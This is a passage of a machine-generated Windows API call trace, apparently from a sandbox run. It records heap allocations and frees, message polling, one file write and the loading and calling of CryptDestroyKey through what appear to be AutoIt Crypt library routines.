[0231.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0231.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a38) returned 0x2f19c98 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1f118 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a38) returned 0x2f1f118 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f19c98 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0231.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f17258 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0231.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0231.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0231.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0231.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0231.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0231.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0231.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0231.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0231.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0231.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1c6d8 | out: hHeap=0x970000) returned 1 [0231.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.864] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.864] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.864] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0231.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.864] WriteFile (in: hFile=0x2a0, lpBuffer=0x3bf3818*, nNumberOfBytesToWrite=0x2a38, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf3818*, lpNumberOfBytesWritten=0x8cf5e4*=0x2a38, lpOverlapped=0x0) returned 1 [0231.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0231.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0231.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0231.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0231.867] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0231.867] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0231.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0231.868] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.868] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.868] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0231.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0231.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0231.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0231.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0231.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0231.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51088, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0231.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0231.869] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0231.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0231.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0231.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0231.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0231.870] CryptDestroyKey (hKey=0xa87250) returned 1 [0231.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0231.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0231.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0231.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0231.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0231.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0231.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0231.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0231.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0231.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.871] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0231.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0231.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0231.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0231.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0231.872] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.872] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0231.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0231.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0231.872] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0231.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0231.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0231.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0231.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0231.873] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0231.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0231.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0231.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0231.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0231.874] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0231.874] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0231.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0231.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0231.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0231.874] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0231.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0231.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0231.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0231.874] PeekMessageW (in: 